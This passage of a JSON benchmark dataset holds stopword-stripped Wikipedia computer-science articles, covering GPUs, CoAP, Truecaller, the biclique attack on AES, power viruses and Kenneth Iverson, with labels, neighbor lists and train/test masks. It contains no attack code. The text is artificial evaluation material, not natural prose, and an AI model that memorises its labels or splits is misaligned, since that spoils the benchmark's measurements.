stanford university create gpu-based client folding home distributed computing project protein folding calculations certain circumstances gpu calculates forty times faster conventional cpus traditionally used applications gpgpu used many types embarrassingly parallel tasks including ray tracing generally suited high-throughput type computations exhibit data-parallelism exploit wide vector width simd architecture gpu furthermore gpu-based high performance computers starting play significant role large-scale modelling three 10 powerful supercomputers world take advantage gpu acceleration gpu supports api extensions c programming language opencl openmp furthermore gpu vendor introduced api works cards amd app sdk cuda amd nvidia respectively technologies allow specified functions called compute kernels normal c program run gpu stream processors makes possible c programs take advantage gpu ability operate large buffers parallel still using cpu appropriate cuda also first api allow cpu-based applications directly access resources gpu general purpose computing without limitations using graphics api since 2005 interest using performance offered gpus evolutionary computation general accelerating fitness evaluation genetic programming particular approaches compile linear tree programs host pc transfer executable gpu run typically performance advantage obtained running single active program simultaneously many example problems parallel using gpu simd architecture however substantial acceleration also obtained compiling programs instead transferring gpu interpreted acceleration obtained either interpreting multiple programs simultaneously simultaneously running multiple example problems combinations modern gpu readily simultaneously interpret hundreds thousands small programs modern workstation gpus nvidia quadro workstation cards using volta turing architectures feature dedicating processing cores tensor-based deep learning applications nvidia current series gpus cores called tensor cores gpus usually significant flops performance increases utilizing 4x4 matrix multiplication division resulting hardware performance 128 tflops applications tensor cores also supposed appear consumer cards running turing architecture possibly navi series consumer cards amd external gpu graphics processor located outside housing computer external graphics processors sometimes used laptop computers laptops might substantial amount ram sufficiently powerful central processing unit cpu often lack powerful graphics processor instead less powerful energy-efficient on-board graphics chip on-board graphics chips often powerful enough playing latest games graphically intensive tasks editing video therefore desirable able attach gpu external bus notebook pci express bus commonly used purpose port may example expresscard mpcie port pcie ×1 5 2.5 gbit/s respectively thunderbolt 1 2 3 port pcie ×4 10 20 40 gbit/s respectively ports available certain notebook systems official vendor support external gpus gained traction recently one notable milestone apple ’ decision officially support external gpus mac os high sierra 10.13.4 also several major hardware vendors hp alienware razer releasing thunderbolt 3 egpu enclosures support continued fuel egpu implementations enthusiasts 2013 438.3 million gpus shipped globally forecast 2014 414.2 million",
    "neighbors": [
      4098,
      8196,
      2081,
      8231,
      4139,
      2097,
      8250,
      2113,
      6213,
      10316,
      8296,
      8301,
      4211,
      10361,
      6266,
      8315,
      6268,
      10393,
      8352,
      4257,
      4258,
      8355,
      6311,
      4270,
      2224,
      4276,
      4283,
      2237,
      4286,
      2241,
      2243,
      196,
      10440,
      2277,
      4334,
      10485,
      2294,
      8438,
      249,
      6406,
      4360,
      6415,
      2339,
      4399,
      309,
      8501,
      2361,
      8514,
      8523,
      6476,
      2383,
      2388,
      344,
      6495,
      8543,
      10601,
      10603,
      4465,
      2420,
      6539,
      398,
      10658,
      10669,
      2480,
      8624,
      10675,
      2490,
      2492,
      446,
      2502,
      456,
      464,
      6608,
      466,
      2524,
      10734,
      6639,
      499,
      4596,
      8698,
      8700,
      508,
      2558,
      10761,
      10769,
      2588,
      6685,
      10781,
      2594,
      6705,
      6715,
      2623,
      2635,
      2638,
      10838,
      8812,
      8815,
      2676,
      630,
      8822,
      6783,
      6797,
      10909,
      2719,
      6815,
      6818,
      6821,
      8890,
      10945,
      8900,
      10954,
      4811,
      10966,
      731,
      10971,
      6884,
      10985,
      8944,
      757,
      2805,
      6910,
      6916,
      781,
      6926,
      784,
      8976,
      2838,
      4886,
      4890,
      799,
      2850,
      8995,
      6949,
      4902,
      6950,
      823,
      9022,
      4928,
      9044,
      2901,
      876,
      2935,
      7033,
      11130,
      2943,
      921,
      9115,
      2979,
      5028,
      9126,
      7086,
      2993,
      9137,
      3014,
      7111,
      980,
      992,
      5088,
      5090,
      995,
      3055,
      7151,
      11247,
      3070,
      3075,
      7173,
      11270,
      11282,
      9235,
      11283,
      11289,
      9244,
      1057,
      9255,
      5165,
      7218,
      3123,
      11322,
      1087,
      7234,
      3142,
      7248,
      1122,
      3175,
      9345,
      3203,
      7309,
      7313,
      9391,
      11449,
      11462,
      5329,
      3282,
      11485,
      11487,
      3300,
      3304,
      5355,
      5358,
      3323,
      5373,
      7421,
      11524,
      1290,
      5386,
      11530,
      9489,
      1298,
      7442,
      1309,
      11549,
      11564,
      1348,
      3406,
      7505,
      11604,
      11605,
      1376,
      1377,
      3434,
      1387,
      11629,
      11631,
      1399,
      1400,
      1402,
      3457,
      7556,
      3470,
      5523,
      1428,
      1461,
      1463,
      7607,
      7614,
      1480,
      3529,
      3540,
      1499,
      1502,
      9707,
      3565,
      9710,
      9714,
      3575,
      3586,
      9732,
      9736,
      9739,
      9741,
      7697,
      7699,
      5655,
      1578,
      9774,
      5686,
      7734,
      7745,
      7747,
      1614,
      5711,
      1644,
      3698,
      9863,
      5793,
      7852,
      7857,
      7858,
      9911,
      9913,
      7869,
      9926,
      9932,
      7911,
      1770,
      5867,
      9964,
      1776,
      5880,
      3835,
      5883,
      5892,
      1798,
      10023,
      3882,
      3886,
      7983,
      1849,
      5948,
      5949,
      7998,
      1871,
      1872,
      1890,
      8035,
      5989,
      6001,
      1911,
      6009,
      6032,
      8109,
      1967,
      4024,
      8122,
      4030,
      1985,
      4036,
      10199,
      6114,
      6129,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10659,
    "label": 5,
    "text": "Constrained_Application_Protocol:constrained application protocol constrained application protocol coap specialized internet application protocol constrained devices defined rfc 7252 enables constrained devices called nodes communicate wider internet using similar protocols coap designed use devices constrained network e.g. low-power lossy networks devices general nodes internet devices different constrained networks joined internet coap also used via mechanisms sms mobile communication networks coap service layer protocol intended use resource-constrained internet devices wireless sensor network nodes coap designed easily translate http simplified integration web also meeting specialized requirements multicast support low overhead simplicity multicast low overhead simplicity extremely important internet things iot machine-to-machine m2m devices tend deeply embedded much less memory power supply traditional internet devices therefore efficiency important coap run devices support udp udp analogue internet engineering task force ietf constrained restful environments working group core done major standardization work protocol order make protocol suitable iot m2m applications various new functionalities added core protocol specified rfc 7252 important extensions various stages standardization process nodes often 8-bit microcontrollers small amounts rom ram constrained networks ipv6 low-power wireless personal area networks 6lowpans often high packet error rates typical throughput 10s kbit/s protocol designed machine-to-machine m2m applications smart energy building automation core group designed coap following features mind mapping coap http also defined allowing proxies built providing access coap resources via http uniform way introduction coap complete networking stack open-standard protocols suitable constrained devices environments becomes available architecture point view coap server installed end node could sensor hand coap client installed controller manages several end nodes registration meanings behind coap code options content type handled iana shown smallest coap message 4 bytes length omitting token options payload coap makes use two message types requests responses using simple binary base header format base header may followed options optimized type-length-value format coap default bound udp optionally dtls providing high level communications security bytes headers packet considered message body length message body implied datagram length bound udp entire message must fit within single datagram used 6lowpan defined rfc 4944 messages fit single ieee 802.15.4 frame minimize fragmentation three significant bits form number known class analogous class http status codes five least significant bits form code communicates detail request response entire code typically communicated form codice_1 find latest coap request/response codes though list gives examples easily extract information fixed header c via macros many coap application domains essential ability address several coap resources group instead addressing resource individually e.g turn coap-enabled lights room single coap request triggered toggling light switch address need ietf developed optional extension coap form experimental rfc group communication coap rfc 7390 extension relies ip multicast deliver coap request group members use multicast certain benefits reducing number packets needed deliver request members however multicast also limitations poor reliability cache-unfriendly alternative method coap group communication uses unicasts instead multicasts relies intermediary groups created clients send group requests intermediary turn sends individual unicast requests group members collects replies sends back aggregated reply client although protocol standard includes provisions mitigating threat ddos amplification attacks provisions implemented practice resulting presence 580,000 targets primarily located china attacks 320gbps",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      1435,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      10159,
      562,
      2996,
      9909,
      10171,
      4797,
      3133,
      3006,
      5181,
      5437,
      5700,
      7364,
      2887,
      8265,
      2509,
      4687,
      6993,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      6651,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 10660,
    "label": 4,
    "text": "Truecaller:truecaller truecaller smartphone application features caller-identification call-blocking flash-messaging call-recording chat voice uses internet service requires users provide standard cellular mobile number registering service developed swedish company true software scandinavia ab app available android ios blackberry symbian windows mobile windows phone truecaller developed true software scandinavia ab privately held company stockholm sweden founded alan mamedi nami zarringhalam 2009 initially launched blackberry 1 july 2009 good response users launched symbian microsoft windows mobile released android apple iphone 23 september 2009 rim blackberry 27 february 2012 windows phone 1 march 2012 nokia series 40 3 september 2012 truecaller five million users performing 120 million searches telephone number database every month 22 january 2013 truecaller reached 10 million users january 2017 truecaller reached 250 million users worldwide 18 september 2012 techcrunch announced openocean venture capital fund led former mysql nokia executives including michael widenius founder mysql investing us 1.3 million truecaller push truecaller ’ global reach truecaller said intended use new funding expand footprint key markets —specifically north america asia middle east february 2014 truecaller received 18.8 million funding sequoia capital alongside existing investor openocean truecaller chairman stefan lennhammer unnamed private investor also announced partnership yelp use yelp api data help identify business numbers call smartphone october year received 60 million niklas zennstrom atomico investment firm kleiner perkins caufield byers 7 july 2015 truecaller launched sms app called truemessenger exclusively india truemessenger enables users identify sender sms messages launch aimed increasing company user base india 17 july 2013 truecaller servers allegedly hacked syrian electronic army group claimed twitter handle recovered 459 gbs database primarily due older version wordpress installation servers 18 july 2013 truecaller issued statement blog stating website indeed hacked claiming attack disclose passwords credit card information",
    "neighbors": [
      2208,
      11170,
      9572,
      488,
      3626,
      7022,
      7983,
      11347,
      1083
    ],
    "mask": "None"
  },
  {
    "node_id": 10661,
    "label": 7,
    "text": "Apache_ORC:apache orc apache orc optimized row columnar free open-source column-oriented data storage format apache hadoop ecosystem similar columnar-storage file formats available hadoop ecosystem rcfile parquet compatible data processing frameworks hadoop environment february 2013 optimized row columnar orc file format announced hortonworks collaboration facebook month later apache parquet format announced developed cloudera twitter apache orc comparable rcfile parquet file formats -- -all three fall category columnar data storage within hadoop ecosystem better compression encoding improved read performance cost slower writes",
    "neighbors": [
      9344,
      10377,
      8460,
      7567,
      1296,
      6161,
      1047,
      8217,
      11161,
      6555,
      8860,
      6943,
      3877,
      11303,
      1327,
      7983,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      4944,
      1363,
      5332,
      7767,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      11235,
      8294,
      11111,
      8425,
      8810,
      747,
      5612,
      2163,
      6774,
      7159,
      1913,
      1018
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10662,
    "label": 4,
    "text": "Biclique_attack:biclique attack biclique attack variant meet-in-the-middle mitm method cryptanalysis utilizes biclique structure extend number possibly attacked rounds mitm attack since biclique cryptanalysis based mitm attacks applicable block ciphers iterated hash-functions biclique attacks known broken full aes full idea though slight advantage brute force also applied kasumi cipher preimage resistance skein-512 sha-2 hash functions biclique attack still best publicly known single-key attack aes computational complexity attack formula_1 formula_2 formula_3 aes128 aes192 aes256 respectively publicly known single-key attack aes attacks full number rounds previous attacks attacked round reduced variants typically variants reduced 7 8 rounds computational complexity attack formula_1 theoretical attack means security aes broken use aes remains relatively secure biclique attack nevertheless interesting attack suggests new approach performing cryptanalysis block ciphers attack also rendered information aes brought question safety-margin number rounds used therein original mitm attack first suggested diffie hellman 1977 discussed cryptanalytic properties des argued key-size small reapplying des multiple times different keys could solution key-size however advised using double-des suggested triple-des minimum due mitm attacks mitm attacks easily applied double-des reduce security formula_5 formula_6 since one independently bruteforce first second des-encryption plain- ciphertext since diffie hellman suggested mitm attacks many variations emerged useful situations basic mitm attack inapplicable biclique attack variant first suggested dmitry khovratovich rechberger savelieva use hash-function cryptanalysis however bogdanov khovratovich rechberger showed apply concept bicliques secret-key setting including block-cipher cryptanalysis published attack aes prior mitm attacks aes many block ciphers received little attention mostly due need independent key bits two 'mitm subciphers order facilitate mitm attack — something hard achieve many modern key schedules aes general explanation biclique structure see article bicliques mitm attack keybits formula_7 formula_8 belonging first second subcipher need independent need independent else matched intermediate values plain- ciphertext computed independently mitm attack variants mitm attacks blocks shared key-bits see 3-subset mitm attack property often hard exploit larger number rounds due diffusion attacked cipher br simply put rounds attack larger subciphers larger subciphers fewer independent key-bits subciphers bruteforce independently course actual number independent key-bits subcipher depends diffusion properties key-schedule way biclique helps tackling allows one instance attack 7 rounds aes using mitm attacks utilizing biclique structure length 3 i.e covers 3 rounds cipher map intermediate state start round 7 end last round e.g 10 aes128 thus attacking full number rounds cipher even possible attack amount rounds basic mitm attack meaning biclique thus build structure effectively map intermediate value end mitm attack ciphertext end ciphertext intermediate state gets mapped end course depends key used encryption key used map state ciphertext biclique based keybits bruteforced first second subcipher mitm attack essence biclique attacks thus besides mitm attack able build biclique structure effectively depending keybits formula_7 formula_8 map certain intermediate state corresponding ciphertext get formula_11 intermediate states formula_11 ciphertexts compute keys maps requires formula_13 key-recoveries since intermediate state needs linked ciphertexts preliminary br remember function biclique map intermediate values formula_14 ciphertext-values formula_15 based key formula_16 br formula_17 procedure br step one intermediate state formula_18 ciphertext formula_19 key formula_20 chosen formula_21 formula_22 function maps intermediate state ciphertext using given key denoted base computation step two two sets related keys size formula_11 chosen keys chosen words br input difference 0 map output difference formula_28 key difference formula_31 differences respect base computation br input difference formula_29 map output difference 0 key difference formula_33 differences respect base computation step three since trails share non-linear components s-boxes trails combined get br formula_34 br conforms definitions differentials step 2 br trivial see tuple formula_35 base computation also conforms definition differentials differentials respect base computation substituting formula_36 formula_20 two definitions yield formula_38 since formula_39 formula_40 br means tuple base computation also xor'ed combined trails formula_41 step four trivial see br formula_42 br formula_43 br formula_44 br substituted combined differential trails result br formula_45 br definition earlier biclique br formula_17 thus possible create biclique size formula_13 formula_13 since formula_11 keys first set keys combined formula_11 keys second set keys means biclique size formula_13 created using formula_52 computations differentials formula_28 formula_29 formula_22 formula_56 formula_57 keys formula_16 also different biclique way biclique constructed leading biclique attack aes practical limitations constructing bicliques technique longer biclique rounds differential trails cover diffusion properties cipher thus plays crucial role effectiveness constructing biclique bogdanov khovratovich rechberger also describe another way construct biclique called 'interleaving related-key differential trails article biclique cryptanalysis full aes step one attacker groups possible keys key-subsets size formula_13 formula_60 key group indexed formula_16 matrix size formula_62 attacker splits cipher two sub-ciphers formula_22 formula_64 formula_65 normal mitm attack set keys sub-ciphers cardinality formula_11 called formula_67 formula_68 combined key sub-ciphers expressed aforementioned matrix formula_69 step two attacker builds biclique group formula_13 keys biclique dimension-d since maps formula_11 internal states formula_72 formula_11 ciphertexts formula_74 using formula_13 keys section build biclique suggests build biclique using independent related-key differentials biclique case built using differentials set keys formula_67 formula_68 belonging sub-ciphers step three attacker takes formula_11 possible ciphertexts formula_74 asks decryption-oracle provide matching plaintexts formula_80 step four attacker chooses internal state formula_72 corresponding plaintext formula_80 performs usual mitm attack formula_22 formula_64 attacking internal state plaintext step five whenever key-candidate found matches formula_72 formula_80 key tested another plain-/ciphertext pair key validates pair highly likely correct key following example based biclique attack aes paper biclique cryptanalysis full aes br descriptions example uses terminology authors attack used i.e variable names etc br simplicity attack aes128 variant covered below. br attack consists 7-round mitm attack biclique covering last 3 rounds key-space partitioned formula_87 groups keys group consist formula_88 keys br formula_87 groups unique base-key formula_20 base-computation selected br base-key two specific bytes set zero shown table represents key way aes 4x4 matrix aes128 br remaining 14 bytes 112 bits key enumerated yields formula_87 unique base-keys one group keys br ordinary formula_88 keys group chosen respect base-key chosen nearly identical base-key vary 2 bytes either formula_94 formula_95 shown 4 bytes br gives formula_97 formula_98 combined gives formula_88 different keys formula_16 formula_88 keys constitute keys group respective base key formula_87 bicliques constructed using independent related-key differentials technique described construct biclique section br requirement using technique forward- backward-differential trails need combined share active non-linear elements known case br due way keys step 1 chosen relation base key differential trails formula_28 using keys formula_67 never share active s-boxes non-linear component aes differential trails formula_29 using key formula_68 therefore possible xor differential trails create biclique bicliques created mitm attack almost begin mitm attack formula_11 intermediate values plaintext br formula_108 br formula_11 intermediate values ciphertext br formula_110 br corresponding intermediate states sub-keys formula_67 formula_68 precomputed stored however mitm attack carried order test key formula_16 necessary recalculate parts cipher known vary formula_108 formula_115 backward computation formula_72 formula_117 4 s-boxes needs recomputed forwards computation formula_80 formula_119 3 in-depth explanation amount needed recalculation found biclique cryptanalysis full aes paper example taken intermediate values match key-candidate formula_16 formula_80 formula_72 found key-candidate tested another plain-/ciphertext pair attack lowers computational complexity aes128 formula_123 3–5 times faster bruteforce approach data complexity attack formula_124 memory complexity formula_125",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      660,
      1173,
      1941,
      4128,
      4389,
      169,
      11185,
      2357,
      10806,
      1847,
      9528,
      2110,
      9541,
      10315,
      6863,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      7643,
      9697,
      8674,
      229,
      618,
      1898,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "None"
  },
  {
    "node_id": 10663,
    "label": 3,
    "text": "UMC_Green_CPU:umc green cpu umc green cpu x86-compatible microprocessor produced umc taiwanese semiconductor company early- mid-1990s offered alternative intel 80486 pin compatible enabling installed 80486 motherboards models power management features intended reduce electricity consumption umc green cpu available different features physical characteristics clock speeds sold limited quantities models feature 8 kb level 1 cache operate clock speeds 25 mhz 33 mhz 40 mhz functionally models except u5d identical differed intended application voltage rating physical packaging u5sd contain floating point unit indistinguishable u5s chips operation though unusual features 486dx pinout opposed common 486sx pinout versions would allow installation certain older motherboards may upgrade sockets hardwired fit 486dx chips one largest chip foundry owners taiwan umc owns several fabrication plants allowed fabricate designs whereas manufacturers notably cyrix contract process third parties ibm texas instruments available models green cpu produced 0.6 μm cmos process chips available plastic ceramic packages different applications majority pqfp variants sold motherboard manufacturers low-cost embedded solution umc u5 series design focused microcode optimizations equivalently clocked intel amd processor required 40 cycles perform integer division whereas umc processors required 7 allowing instruction complete significantly faster performance generally observed higher competing processors clock-for-clock basis 40 mhz u5s model comparable amd am486sx2 66 mhz correctly configured motherboards due error microcode microsoft windows 98 second edition identifies processors intel pentium mmx could cause operating system software running within crash exhibit undefined behavior umc produced small quantity clock doubling processors labeled u486dx2 processors designed compete clock doubling solutions intel 80486dx2 amd am486dx2 cyrix cx486dx2 due ongoing legal troubles umc withdrew u486dx2 production processor ever produced engineering sample never made market manufactured 0.35 μm cmos process contained within ceramic package 1994 intel alleged umc infringed upon patent 80486 microprocessor filed complaints umc distributors umc countered claims anti-trust suit case eventually settled court umc withdrawing product ceasing production 80486-compatible microprocessors result dispute processors prohibited sale within united states visibly labeled placement label varies ceramic u5s u5d models typically display u.s. sale import part silkscreen top chip u5sx u5sd models usually u.s. sale printed onto golden die cover underside package labeling often absent plastic packages",
    "neighbors": [
      499,
      10734,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 10664,
    "label": 4,
    "text": "Power_virus:power virus power virus computer program executes specific machine code reach maximum cpu power dissipation thermal energy output central processing units computer cooling apparatus designed dissipate power thermal design power rather maximum power power virus could cause system overheat logic stop processor may cause permanent physical damage power viruses malicious often suites test software used integration testing thermal testing computer components design phase product product benchmarking stability test applications similar programs effect power viruses high cpu usage stay user control used testing cpus example overclocking spinlock poorly written program may cause similar symptoms lasts sufficiently long different micro-architectures typically require different machine code hit maximum power examples machine code appear distributed cpu reference materials",
    "neighbors": [
      3882,
      4334,
      1776,
      7515,
      7739
    ],
    "mask": "Test"
  },
  {
    "node_id": 10665,
    "label": 4,
    "text": "Confederation_of_European_Data_Protection_Organisations:confederation european data protection organisations confederation european data protection organisations cedpo european umbrella organisation data protection organisations cedpo founded september 2011 national data protection organisations european umbrella organisation far 2014 without explicit legal form cedpo pursues promote role data protection officer provide advice balanced practicable effective data protection addition cedpo aims contribute better harmonisation data protection law practices european union eu european economic area eea four founder members cedpo association française des correspondants à la protection des données à caractère personnel afcdp france asociación profesional española de privacidad apep spain gesellschaft für datenschutz und datensicherheit e.v gdd germany nederlands genootschap van functionarissen voor de gegevensbescherming ngfg netherlands present legal entities cedpo include",
    "neighbors": [
      2818
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10666,
    "label": 9,
    "text": "SuperBASIC:superbasic superbasic advanced variant basic programming language many structured programming additions developed sinclair research jan jones early 1980s originally superbasic intended home computer code-named superspectrum development project later cancelled however superbasic subsequently included rom firmware sinclair ql microcomputer announced january 1984 also serving command line interpreter ql qdos operating system notable first second-generation basic integrated microcomputer operating system making latter user-extendable—as exemplified linus torvalds formative years example illustrates last eight features entering statements entering print fri screen cleared e.g entering new function iso act like extension operating system similarly according ql user guide many operating system commands defined procedures auto 11,2",
    "neighbors": [
      3718,
      7691,
      1805,
      9997,
      786,
      11412,
      22,
      3736,
      3481,
      9881,
      797,
      3233,
      11683,
      5925,
      8101,
      4136,
      8494,
      303,
      7343,
      7983,
      11315,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      8642,
      11204,
      10750,
      712,
      847,
      5455,
      6352,
      1879,
      92,
      11229,
      2915,
      9188,
      5733,
      7269,
      11243,
      2541,
      8429,
      5747,
      759,
      6778,
      6910,
      1535
    ],
    "mask": "Train"
  },
  {
    "node_id": 10667,
    "label": 5,
    "text": "Rsocket:rsocket rsocket application protocol initially developed netflix supports reactive streams motivation behind development replace hypertext transfer protocol http inefficient many tasks microservices communication protocol less overhead rsocket binary protocol use byte stream transports tcp websockets aeron enables following symmetric interaction models via async message passing single connection supports session resumption allow resuming long-lived streams across different transport connections particularly useful mobile‹–›server communication network connections drop switch reconnect frequently",
    "neighbors": [
      9834,
      1051
    ],
    "mask": "None"
  },
  {
    "node_id": 10668,
    "label": 9,
    "text": "Kenneth_E._Iverson:kenneth e. iverson kenneth eugene iverson 17 december 1920 – 19 october 2004 canadian computer scientist noted development programming language apl honored turing award 1979 pioneering effort programming languages mathematical notation resulting computing field knows apl contributions implementation interactive systems educational uses apl programming language theory practice ken iverson born 17 december 1920 near camrose town central alberta canada parents farmers came alberta north dakota ancestors came trondheim norway world war ii served first canadian army royal canadian air force received b.a degree queen university m.sc ph.d. degrees harvard university career worked harvard ibm i. p. sharp associates jsoftware inc. née iverson software inc. iverson suffered stroke working computer new j lab 16 october 2004 died 19 october 2004 age 83 iverson began school 1 april 1926 one-room school initially grade 1 promoted grade 2 3 months grade 4 end june 1927 left school grade 9 depths great depression work family farm thought schooling led becoming schoolteacher desire become one age 17 still school enrolled correspondence course radios de forest training chicago learned calculus self-study textbook world war ii serving royal canadian air force took correspondence courses toward high school diploma war iverson enrolled queen university kingston ontario taking advantage government support ex-servicemen threat air force buddy said would beat brains grasp opportunity graduated 1950 top student bachelor degree mathematics physics continuing education harvard university began department mathematics received master degree 1951 switched department engineering applied physics working howard aiken wassily leontief howard aiken developed harvard mark one first large-scale digital computers wassily leontief economist developing input–output model economic analysis work would later receive nobel prize leontief model required large matrices iverson worked programs could evaluate matrices harvard mark iv computer iverson received ph.d. applied mathematics 1954 dissertation based work harvard iverson met eoin whitney 2-time putnam fellow fellow graduate student alberta future ramifications iverson stayed harvard assistant professor implement world first graduate program automatic data processing period iverson developed notation describing analyzing various topics data processing teaching classes writing brooks automatic data processing appalled find conventional mathematical notation failed fill needs began work extensions notation suitable particular adopted matrix algebra used thesis work systematic use matrices higher-dimensional arrays tensor analysis operators sense heaviside treatment maxwell equations higher-order functions function argument function result notation also field-tested business world 1957 6-month sabbatical spent mckinsey company first published paper using notation description finite sequential processes initially report number 23 bell labs later revised presented fourth london symposium information theory august 1960 iverson stayed harvard five years failed get tenure n't published anything one little book iverson joined ibm research 1960 doubled salary preceded ibm fred brooks advised stick whatever really wanted management starved ideas anything clearly crazy would find support particular allowed finish publish programming language brooks automatic data processing two books described used notation developed harvard automatic data processing programming language began one book material grew magnitude level separation proved wise ibm iverson soon met adin falkoff worked together next twenty years chapter 2 programming language used iverson notation describe ibm 7090 computer early 1963 falkoff later joined iverson ed sussenguth proceeded use notation produce formal description ibm system/360 computer design result published 1964 double issue ibm systems journal thereafter known grey book grey manual book used course computer systems design ibm systems research institute consequence formal description attracted interest bright young minds one hotbed interest stanford university included larry breed phil abrams roger moore charles brenner mike jenkins later made contributions apl donald mcintyre head geology pomona college first general customer installation 360 system used formal description become expert ibm systems engineer assigned pomona completion formal description falkoff iverson turned attention implementation work brought rapid fruition 1965 larry breed phil abrams joined project produced fortran-based implementation 7090 called ivsys iverson system autumn 1965 first batch mode later early 1966 time-shared interactive mode subsequently breed dick lathwell ex university alberta roger moore i. p. sharp associates produced system/360 implementation three received grace murray hopper award 1973 work design implementation apl\\360 setting new standards simplicity efficiency reliability response time interactive systems 360 implementation work underway iverson notation renamed apl falkoff workspace 1 cleanspace saved 1966-11-27 22.53.58 utc apl\\360 service began within ibm several weeks outside ibm 1968 additional information implementation apl\\360 found acknowledgements apl\\360 user manual appendix chronology apl development design apl formal description especially implementation drove evolution language process consolidation regularization typography linearization syntax function definition described apl\\360 history design apl evolution apl two treatises period conventions governing order evaluation algebra language apologias apl notation notation used falkoff iverson teach various topics various universities ibm systems research institute 1964 iverson used notation one-semester course seniors fox lane high school later swarthmore high school apl became available first application teach formal methods systems design nasa goddard also used hotchkiss school lower canada college scotch plains high school atlanta public schools among others one school students became eager broke school hours get apl computer time another apl enthusiasts steered newbies basic maximize apl time 1969 iverson apl group inaugurated ibm philadelphia scientific center 1970 named ibm fellow used funding came ibm fellow bring visiting teachers professors various fields including donald mcintyre pomona jeff shallit summer student period several months visitors would start using apl expositions fields hope later would continue use apl home institutions iverson work time centered several disciplines including collaborative projects circuit theory genetics geology calculus psc closed 1974 group transferred california others including iverson remained east later transferring back ibm research iverson received turing award 1979 following table lists publications iverson authored co-authored ibm reflect two main strands work 1980 iverson left ibm i. p. sharp associates apl time-sharing company preceded ibm colleagues paul berry joey tuttle dick lathwell eugene mcdonnell ipsa apl language systems group managed eric iverson ken iverson son roger moore one apl\\360 implementers vice president iverson worked develop extend apl lines presented operators functions language work gained impetus 1981 arthur whitney iverson produced model apl written apl time working ipsa oag database iverson introduced arthur whitney son eoin whitney apl 11-years-old 1974 recommended summer student position ipsa calgary model apl syntax driven 11-by-5 table whitney also invented rank operator process language design simplified extended rationalized apl january 1983 multiple editions dictionary apl language 1984 1987 dictionary apl september 1987 within ipsa phrase dictionary apl came use denote apl specified dictionary apl referred dictionary dictionary apl syntax controlled 9-by-6 table parsing process precisely succinctly described table 2 primitive monadic ⊥ modeled apl word formation lexing 1970s 1980s main apl vendors ibm stsc ipsa three active developing extending language ibm apl2 based work jim brown work apl2 proceeded intermittently 15 years actual coding starting 1971 apl2 becoming available iup installed user program ibm product classification 1982 stsc experimental apl system called nars designed implemented bob smith nars apl2 differed fundamental respects dictionary apl differed i.p sharp implemented new apl ideas stages complex numbers enclosed boxed arrays match composition operators 1981 determinant operator 1982 rank operator link left right identity functions 1983 however domains operators still restricted primitive functions subsets thereof 1986 ipsa developed sax sharp apl/unix written c based implementation stsc language specified dictionary restrictions domains operators alpha version sax became available within i.p sharp around december 1986 early 1987 education iverson developed sharp apl minicourse used teach ipsa clients use apl applied mathematics programmers mathematics programming used computer science courses t.h twente publications iverson authored co-authored i. p. sharp associates iverson retired i. p. sharp associates 1987 kept busy jobs regarding language design significant activities period invention fork 1988 years struggled find way write f+g calculus scalar operators 1978 til operator 1982 catenation reshape operators 1984 union intersection operators 1987 yoke 1988 finally forks 1988 forks defined follows moreover f g p q r ←→ f g p q r thus write f+g calculus one write f+g apl iverson eugene mcdonnell worked details long plane rides apl88 conference sydney australia iverson coming initial idea waking nap iverson presented rationale work post 1987 follows roger hui described final impetus got j started appendix implementation j hui classmate whitney university alberta studied dictionary apl language jobs modelled parsing process least two different ways investigated uses dictionary apl diverse applications well january 1987 august 1989 access sax later part period used daily basis j initially took dictionary apl specification j interpreter built around table 2 dictionary c data program structures designed parse table c corresponded directly parse table dictionary retrospect iverson apl87 paper apl87 five pages prescribed essential steps writing apl interpreter particular sections word formation parsing arthur whitney addition one-page thing contributed j development suggesting primitives oriented leading axis agreement generalization scalar extension prefix instead suffix total array ordering defined one objectives implement fork turned rather straightforward inclusion one additional row parse table choice implement forks fortuitous fortunate realized later forks made tacit expressions operator expressions complete following sense sentence involving one two arguments use arguments operand written tacitly fork compose left right identity functions constant functions two obvious differences j apl dialects use terms natural languages instead mathematics computer science practice began dictionary apl noun verb adverbs alphabet word formation sentence ... instead array function operator character set lexing expression ... b use 7-bit ascii characters instead special symbols differences j apl described j apl programmer apl j j source code available jsoftware gnu general public license version 3 gpl3 commercial alternative eric iverson founded iverson software inc. february 1990 provide improved sharp apl/pc product quickly became obvious shared interests goals may 1990 iverson hui joined iverson software inc. later joined chris burke company soon became j name changed jsoftware inc. april 2000 publications iverson authored co-authored iverson software inc. jsoftware inc.",
    "neighbors": [
      6529,
      5635,
      7048,
      9993,
      10508,
      11020,
      6160,
      8599,
      1178,
      667,
      8987,
      1702,
      2216,
      2482,
      1976,
      4921,
      9019,
      4799,
      4800,
      10049,
      4930,
      11075,
      70,
      8262,
      3529,
      1099,
      7630,
      2519,
      1883,
      11099,
      7775,
      9825,
      8695,
      9315,
      11625,
      6378,
      2283,
      4331,
      11242,
      2670,
      2798,
      1783,
      505,
      3323,
      511
    ],
    "mask": "None"
  },
  {
    "node_id": 10669,
    "label": 3,
